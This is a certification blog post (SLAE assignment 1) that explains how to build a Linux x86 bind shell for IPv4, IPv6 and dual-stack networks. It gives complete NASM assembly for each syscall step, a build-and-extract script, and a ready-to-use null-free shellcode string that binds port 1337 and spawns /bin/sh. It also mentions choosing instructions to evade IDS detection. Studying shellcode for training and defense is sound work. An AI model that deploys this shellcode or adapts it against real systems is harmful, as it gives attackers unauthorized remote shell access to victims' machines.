TCP IPv4, IPv6, and Dual Stack Linux x86 Bind Shell

By August 19, 2018 August 30th, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 1
Github repo: https://github.com/kkirsche/SLAE
Exploit-DB: Entry 45291


Introduction

Hey everyone! Earlier this year, I finished both the OSCP and the OSWP. Thanks to the challenge, I’ve been excited to try the OSCE certification. Before taking this on though, I wanted to prepare myself, and to do so, I decided to take on the 32-bit SLAE course. As part of this exam, there are seven different assignments that need to be solved, of varying difficulties.

Requirements

  • The shellcode should bind to a specific port and execute a shell when it receives an incoming connection
  • The port number should be easily configurable via a wrapper script of by marking the byte in the code for easy editing

Personally though, I didn’t think this took the idea far enough, as this would only give us a working IPv4 bind shell or a working IPv6 shell, it wouldn’t provide us with shellcode which we can use in an IPv4 network, and IPv6 network, or if we don’t know what network protocol we’ll want to use. As such, I added the following requirements, which ended up exposing a few things I hadn’t fully understood when doing just a single network stack:

  • Create shellcode for IPv4 only networks
  • Create shellcode for IPv6 only networks
  • Create shellcode for hybrid (IPv4 and IPv6) networks

Bind Shells Galore!

C has never been my language of choice. I’ve always found it a bit odd in it’s style. I started off my journey as a result trying to build a bind shell using Golang. This kind of worked, but never really was a true bind shell. It never gave an actual shell, it really was just a command executor. None the less, if interested, we’ll go into it below since this was where the process started for me.

(Sort of a) Golang Bind Shell

This code is functional as is, but could use some adjustments if we wanted to actually use this on an engagement. For example, we should turn off / remove the different fmt.Print statements so that we don’t accidentally output something to a user, and so we reduce the size of our binary. Second, we probably would want to provide a way to maintain state rather than executing each command as a single, isolated command. This would take a bit more work, and if you want to stay in go without dipping into the syscall modules, take a look at Writing a simple shell in Go which does a great job of discussing some of these concepts.

Essentially, what we’re doing here is:

  1. Creating a TCP listener on the port which the bind_port constant is set to
  2. We create an infinite loop so that our shell is reusable and accept any connection that we receive.
  3. We then create a goroutine for the shell to execute in, so that the port is not blocked and the shell can be re-used to create multiple spawned shells
  4. Within the goroutine, we start off by printing a warning that we don’t support interactive commands. This is easy to forget, so it’s meant to be a nice reminder to the user
  5. We then read from the connection until we hit a newline character. This is most commonly indicative of the end of a command within shells.
  6. We prepare the command by removing any leading or trailing carriage returns or newlines from the string, and create an array to determine if we have a command with arguments or no arguments.
  7. We then have our output write to a bytes buffer which we then write back to the connection once the command has completed. Note that this sadly means that we do not stream output, it’s the entire output all at once

The restrictions of the above program, such as no streaming output, means that honestly this isn’t what we want for the exam, but it was a good learning experience. Instead, we turned back to the tried and true C programming language to construct a more appropriate bind shell for our needs.

IPv4 and IPv6 Bind Shell

Since that previous item worked, but didn’t give us the functionality we want, we’re going to instead take a look at doing this in C. Below is each network bind shell type:

Dual Network Stack (IPv4 and IPv6) Bind Shell

IPv4 Bind Shell

IPv6 Bind Shell

So let’s break down what we’re doing here. We’ll specifically be discussing the dual network stack bind shell, but the concepts outlined apply roughly to what’s occurring in the other two.

Lines 1–6 are just imports for the different functions we need. We’re not going to discuss these as they’re pretty straight forward.

On lines eight and nine, we define the two variables that we’ll be using throughout our bind shell. First, we define the sockfd variable as an integer, which will hold the socket file descriptor that we get back from the socket call. Second, we have the recvConn variable which is the reference to the active connection once we accept it. This is also an integer.

On line 11, we have a constant integer, NO, which we’ll be using later to set a socket option stating that the socket we made is not an IPv6 only socket. This is the key to how our bind shell will be able to work on both IPv6 and IPv4.

With our variables out of the way, we get to the meat of the bind shell. We start off on line 18 with a call to socket to create the socket and we give it three arguments: first, the domain we want this socket to be in (e.g. IPv4 or IPv6), second we provide the communication type which states how we’ll communicate using the socket, and lastly we provide the protocol that we’ll be communicating in on this socket. In our case, we are creating an IPv6 socket using AF_INET6, which will be used for bi-directional communication as noted by SOCK_STREAM,using the IP protocol per the 0.

The protocol here is interesting as you’ll sometimes see people use either the IPv6 protocol or the IPv4 protocol directly, but because we’re going to be using both IPv4 and IPv6, we need to be more generic by simply saying we’ll use the IP protocol.

With our socket created, we then explicitly set the IPv6 only option, which would potentially prevent us from binding the same port on both IPv4 and IPv6 addresses. To set this option, we provide five arguments: the socket file descriptor to set the option on, the socket level which references the operating system’s socket abstraction, the option which is being set, the option value, and lastly the size of the option.

In our case, we pass the socket file descriptor from the socket command, provide the IPPROTO_IPV6 level, and set the IPV6_V6ONLY to a value of 0, which is the value of no or false. If we wanted to make the socket IPv6 only, we would instead change this to a 1.

With our options set, on lines 24–32 we build the listening host structure. The variable names, v4lhost and v6lhost are based on the variables metasploit uses for listening hosts, LHOST. In our case, we provide the IP family (IPv4 or IPv6), the port which we’ll bind to, and then the address to bind to (which in our case is ANY / ALL addresses that the machine has for this address family).

Lines 31 and 32 are deceptively simple though, as by using variables it hides the size of the address that we’re actually working with. Remember that an IPv6 address is 128 bits, while an IPv4 address is 32 bits. This will be very important when we convert this into assembly language.

Once we have our structures built, we bind our socket to the IPv4 and IPv6 addresses on the host. Notice that we have to call this twice because we want to bind once for IPv4 and once for IPv6.

Once we bind the port, we begin listening and then accept a connection which comes in on the port we’re listening to.

Once we receive the connection on our socket, we run dup2. This looks a little weird until you understand what this is doing. In this case, we’re telling the system that file descriptor 0, 1 and 2 or stdin, stdout, and stderr, should be directed through the connection we received.

Lastly, with the connection received and our inputs and outputs redirected, we use execve to begin a shell using /bin/sh for maximum portability. When the shell is done, we clean up by closing the connection on our side and returning 0 to say that our shell completed successfully.

Moving From C to Assembly

With our three different bind shells in place, it’s time to convert this over to x86 Assembly Language. This requires us to make a few changes because of how socket operations actually occur at the assembly level. Instead of calling socket, setsockopt, or other socket commands, we actually need to use the socketcall command, which is a generic socket syscall which you can trigger different socket operations through. It’s discussed in more detail on it’s manpage.

Technically, all of the following are the Netwide assembly (nasm) format of assembly written in Intel syntax. Other types you might encounter include GNU assembly (ASM), Motorola 680×0 Assembly (asm68k), Microsoft assembly (masm), and Turbo assembly (tasm).

x86 ASM Dual Network Stack (IPv4 and IPv6) Bind Shell

x86 ASM IPv4 Bind Shell

x86 ASM IPv6 Bind Shell

Similar to the C code above, we’ll only explain what’s happening in the dual network stack assembly code. This was written specifically to be null free, and be unreliant on any predefined conditions such as empty registers. This allows us to use the shellcode we produce from this assembly in any application safely, as we ensure that it will work regardless of pre-existing conditions.

Let’s get started. So we start off by doing the basic assembly language structure by creating our start point as a global and then defining it within the text section. Nothing special here.

The first major section we get to is the socket call, which is represented by the following block of code.


; socket
;; cleanup
xor ebx, ebx
;; arguments
push ebx ; #define IP_PROTO 0
push 0x1 ; #define SOCK_STREAM 1
push 0xa ; #define PF_INET6 10
;; function
mov ecx, esp ; pointer to args on the stack into ecx
push 0x66
pop eax ; socketcall 0x66 == 102
inc ebx ; #define SYS_SOCKET 1
;; call
int 0x80
;; returned data
xchg esi, eax ; sockfd eax -> esi

First thing we do is a bit of cleanup. We need to have a null value to state that we’re using the IP_PROTO (because we want to use either the IPv4 or IPv6 protocol, both members of the more generic Internet Protocol family). To get this, we first xor ebx with itself. Anything that is xor’d with itself will result in a zero value, thus giving us the null we need.

Because we’re on x86, we need to push our arguments onto the stack in reverse order. So the last argument first, then the second to last, etc. In this way, we push a zero for IP_PROTO, a one for the SOCK_STREAM value, and lastly a 0xa (10 decimal) representing PF_INET6. You may notice that in the C code we used AF_INET6. This has to do with a weird historic reason, but essentially PF_INET values should be used in socket calls, while AF_INET values should be used in structs. More on this in this StackOverflow answer.

Once we have our function arguments, we need to setup the actual function call. We do this by pushing a pointer to our arguments (which are on the stack, represented by ESP) into ecx. We then use a push byte 0x66 / pop eax technique to pop the value 0x66 (or 102 decimal) into eax. This tells the system that we’d like to use to the socketcall system call. The value of this method is that we save a byte over first xor’ing the eax register and then moving 0x66 into al (eax lower half). We need to do this for the first time because it could be a completely full register before this happens. Lastly, we increment ebx, which was zero’d out during the argument section so that we have a 1 in the register. This specifies which socket operation we want to perform. In this case, we’re performing the SYS_SOCKET operation, which is what the socket function in C calls to under the hood.

Now that we have our function setup and are arguments on the stack, we execute our interrupt 0x80 to execute the function. This places our return value into eax, which is the socket file descriptor. After we’ve called it, we exchange (fancy way of switching values) between eax and esi. By doing this, we’re putting our socket file descriptor into esi, which is not commonly used by the functions we’ll be working with.

With our socket created, and our socket file descriptor safe, we now need to make sure that the system is set to allow this socket for both IPv4 and IPv6. While it’s common for systems to allow this, we don’t want to risk encountering a system which restricts this. Thus, we explicitly set this.


; setsocketopt
;; cleanup
xor eax, eax
;; arguments
push eax ; NO = 0x0
mov edx, esp ; get a pointer to the null value
push 0x2 ; sizeof(NO)
push edx ; pointer to NO
push 0x1a ; #define IPV6_V6ONLY 26
push 0x29 ; #define IPPROTO_IPV6
;; function
mov ecx, esp ; pointer to args on the stack into ecx
mov al, 0x66 ; socketcall 0x66 == 102
mov bl, 0xe ; #define SYS_SETSOCKOPT 14
;; call
int 0x80

Similar to what we did during the socket call, we start off by setting things up. Since we exchanged the values of ESI and EAX, we don’t know what ESI had before our code, which is now in EAX. Thus, we need to clear the EAX register as it might be full after our exchange.

Since we want to set a value of 0, which tells the system that this is not an IPv6 only socket, we then push the now zero’d out register EAX onto the stack. We’re going to need the memory address of this value, so we move the memory address of the 0 into EDX. This is just a temporary storage action.

With the pointer saved, we then push our arguments onto the stack in reverse order. First, the value 2 which is the size of an integer, then the pointer to the 0 value (NO variable from our C code) using the EDX register, 0x1a (26 decimal) to specify which option we’re setting, and lastly 0x29 (41 decimal) to specify the level we’re working with.

As we did before, we have our arguments on the stack, so we can now prepare the registers for our actual function call. We do this in lowest register to highest register order, moving a pointer to our function arguments into ECX, 0x66 (socketcall syscall) into al, and 0xe (14 decimal) into bl. This 0xe tells the socketcall syscall that we’re going to perform a setsockopt socket call type.

We’re using mov here as opposed to the push / pop technique we used before because at this point we know what the values are and we’ve controlled them. We zero’d out EAX at the beginning of the section, so we can safely set the value via mov, and we know that EBX after our first socket call is not large enough to worry about a mov.

With our function and arguments in place, we repeat the int 0x80 to trigger the function call. Since we expect this will be used remotely without our ability to see what’s happening, we aren’t going to handle any of the error values.

Now that the system knows we can use this socket on both IPv4 and IPv6, we then begin the process of binding to the system’s IPv4 and IPv6 addresses. To keep our code clean, we first bind to IPv4 like so:


; bind ipv4
;; cleanup
xor edx, edx
;; v4lhost struct
push edx ; #define INADDR_ANY 0
push word 0x3905 ; port 1337 in big endian format
push 0x2 ; #define AF_INET 2
;; arguments
mov ecx, esp ; pointer to v4lhost struct arguments
push 0x10 ; sizeof v4lhost
push ecx ; pointer v4lhost
push esi ; push sockfd onto stack
;; function
mov ecx, esp ; argument pointer into ecx
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

In this situation we follow the same mantra as before. Cleanup, arguments, function, call function. This helps organization and makes the code more consistent to read. We start off by cleaning up the EDX register using xor. I’ve seen situations where people use the cdq command to clear the EDX register, but I decided not to use it as that will cause unexpected behavior if the signed flag is set due to a failed socket creation or other issue.

With our empty EDX register, we then push our arguments onto the stack, again in reverse order. We first push the 0 from EDX, which is the normal value of the constant INADDR_ANY, meaning any IPv4 address on the host. We then push our port number. This is unique as we push this in big-endian format, which is the network byte order. If you aren’t familiar with network byte order, it’s discussed on Wikipedia here.

Lastly, since this is the IPv4 structure, we push a 0x2 (2 decimal) to state that this is the IPv4 address family (AF).

With our listening host structure in place, we can setup the function arguments. We first store a pointer to the listening host structure in ECX, we then push 0x10 (16 decimal) onto the stack to define the size of the structure in ECX, we then push the pointer to the structure onto the stack (since we call from socketcall, our arguments go on the stack), and lastly we push our socket file descriptor which we stored in ESI earlier onto the stack.

Once we have our arguments on the stack, we can then setup our function call. Socketcall, as we saw before, puts a pointer to our arguments in ECX, the socketcall type in EBX (0x2 or bind socket), and then we put 0x66 (102 decimal) into EAX so that we use the generic socketcall system call (syscall for short). With our function and it’s arguments in place, we then trigger the function using 0x80.

With our IPv4 address bound (binded?) we then need to also bind the IPv6 address. This is a little interesting compared to what we had to do with the IPv4 address space. Unlike before where a single null value was enough for the any IPv4 address, because of IPv6’s expanded address size (128-bit vs. 32-bit), we need to expand the zero value into multiple double words.


; bind ipv6
;; cleanup
xor eax, eax
;; v6lhost struct
push dword eax ; v6_host.sin6_addr
push dword eax
push dword eax
push dword eax
push dword eax ; v6_host.sin6_flowinfo
push word 0x3905 ; port 1337
push word 0x0a ; PF_INET6
;; arguments
mov ecx, esp ; pointer to struct into ecx
push 0x1c ; sizeof struct
push ecx ; pointer to struct
push esi ; sockfd
;; function
mov ecx, esp ; arguments into register
mov bl, 0x2 ; #define SYS_BIND 2
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80

First of course, we need a null value. We create this by xor’ing EAX with itself. With a null register ready, we then push this onto the stack. This tells the system that we’re going to use any IPv6 address on the host, not just a single IP. Once we have our IP address on the stack, we then push our port number again. This should be the exact same port that we used before. We should NOT use a different port, because we’ve setup the system for port re-use between IPv4 and IPv6. If you were going to use different ports, the setsockopt call would not be necessary. Lastly, we specify the protocol family (PF) as IPv6.

This finishes our structure and allows us to now focus on the function arguments. Similar to what we did with the IPv4 bind call, we put a pointer to our structure in the ECX register. We then push the size of our structure (0x1c hex or 28 decimal) onto the stack, then a pointer to our structure (stored in ECX, so we use push ecx), and then our socket file descriptor from ESI.

Now that our arguments are on the stack, we move a pointer to our arguments into ECX, move 0x2 into EBX to state that we want to do a bind socket call, and then use 0x66 to put the function to trigger as socketcall. With our function setup, we then trigger the function using 0x80.

We’ve now bound our IPv4 and IPv6 addresses explicitly. We can now accept any connections which we receive. We do this with the following block of assembly:


; accept
;; cleanup
xor ebx, ebx
;;arguments
push ebx ; push NULL
push ebx ; push NULL
push esi ; sockfd
;; function
mov ecx, esp ; pointer to args into ecx
mov bl, 0x5 ; #define SYS_ACCEPT 5
mov al, 0x66 ; socketcall 0x66 == 102
;; call
int 0x80
;; returned data
xchg ebx, eax ; ebx holds the new sockfd that we accepted

This is where we accept our connections. We first setup our function by clearing the EBX register by xor’ing it with itself. Since the accept socket call has 3 arguments [int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) to be exact], we want NULL’s in the socklen_t and sockaddr. As such, we push the value of EBX twice, representing those two NULL values. The last argument, sockfd, we then push ESI which is storing our socket file descriptor.

With our arguments in place, we then setup the function. Moving a pointer to the arguments into ECX, setting the socketcall type to SYS_ACCEPT which is what the C accept function uses into EBX, and then setting the socketcall function, represented by 0x66, into EAX.

With everything setup, we then trigger the accept function with int 0x80.

We need the client socket file descriptor that the accept command returns though, so we move the return value from EAX to EBX using the xchg command.

Now that we have a connection, we have to connect stdin, stdout, and stderr to the connection we received. We can do this using the dup2 system call.


; dup file descriptor
;; setup counters
sub ecx, ecx ; zero out ecx
mov cl, 0x2 ; create a counter
;; loop
duploop:
mov al, 0x3f ; SYS_DUP2 syscall
int 0x80 ; call SYS_DUP2
dec ecx ; decrement loop counter
jns duploop ; as long as SF is not set, keep looping

We start off by clearing the ECX register. We could use xor, but we instead use sub to reduce the change that we’ll be detected by IDS / IPS. Once we have a zeroed out register, we then move the number of times we want to repeat the action into the lower section of ECX.

We then define a label for our loop, in this case duploop representing that we’re looping the duplication function. We then move the system call we want into AL, the lower portion of the EAX register. Trigger the call with int 0x80, then we decrement the counter and check if we’ve completed the loop, via the signed flag. This allows us to repeat three times (2, 1, 0 and then we complete the loop).

We have the inputs and outputs connected now, but we don’t have any programs running yet for these to connect to. As such, we need to finish things up by triggering our execve to trigger our shell which the inputs and outputs will be connected to.


; execve
;; cleanup
xor edx, edx
;; command to run
push edx ; NULL string terminator
push 0x68732f2f ; hs//
push 0x6e69622f ; nib/
;; arguments
mov ebx, esp ; pointer to args into ebx
push edx ; null ARGV
push ebx ; command to run
;; function
mov ecx, esp
mov al, 0x0b ; execve systemcall
int 0x80

We start off by emptying EDX, and pushing this onto the stack. This is the null terminator that C programs use to represent the end of a string. We then push /bin/sh (actually /bin//sh so that we end up with an even number of bytes) onto the stack as the program we want to execute.

With this in place, we now move our target program into EBX (since it’s on the stack, we move the address ESP is pointing to into EBX), we then push a NULL value representing ARGV, then push a pointer to our string argument. Now we have our function arguments on the stack.

We move the pointer to the arguments into ECX. Then set our execve system call into EAX, and trigger it with int 0x80. This executes the shell, giving us a working bind shell.

Testing and Extracting Our Shellcode

So we now have a working application which binds on both our IPv4 and IPv6 addresses on port 1337. We need a way to test this though. To compile our assembly and make sure it works, we use the following script, assuming that our assembly is stored in dual_stack_bind_shell.nasm. We do this, and extract the shellcode via the code below:


#!/bin/bash
binary=dual_stack_bind_shell
echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o "${binary}.o" "${binary}.nasm"
echo '[+] Linking ...'
ld -o "${binary}" "${binary}.o" -fno-stack-protector -shared -z execstack
echo '[+] Dumping shellcode ...'
objdump -d "./${binary}"|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
echo '[+] Removing object file'
rm -f "${binary}.o"
echo '[+] Done!'

With this, we have a working bind shell on both IPv4 and IPv6:

Nice! It works. With this, it outputs our shellcode:

"\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

Obviously, it’s hard to test this on it’s own, so I wrote a little C program to pollute some of the registers and then call this. Warning though, this is a REALLY big file, because this is also what was submitted to exploit-db, so I wanted it to stand fully on it’s own with as much information as possible.

Moving from fixed port number to a dynamic port value

W00t! This works! Now though, we have one last requirement for the SLAE exam, and that’s a wrapper script to change the port number. Personally, I would argue this isn’t something that we should be doing at the assembly level, but I understand why we are doing so.

As such, we’ll do it with Python.

Changing the port

Now that we have shellcode ready, we need to make sure we can change the port easily. We’ll do that with Python using the following script:

This will allow us to generate shellcode which will work with the port of our choice. Interestingly, even though in our assembly we use big-endian, I noticed that GCC / objectdump was dumping in little endian. As such, that’s what this python script is generating. To change this, we can reverse the order of our format arguments, but at this time I don’t feel it’s necessary as testing on Ubuntu 18.04 32-bit worked perfectly with this shellcode.

Conclusion

At this point, we have usable shellcode, which is register independent (no matter what was there before, this will work), and assuming a port number that is null free, the shellcode will also be null free.

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply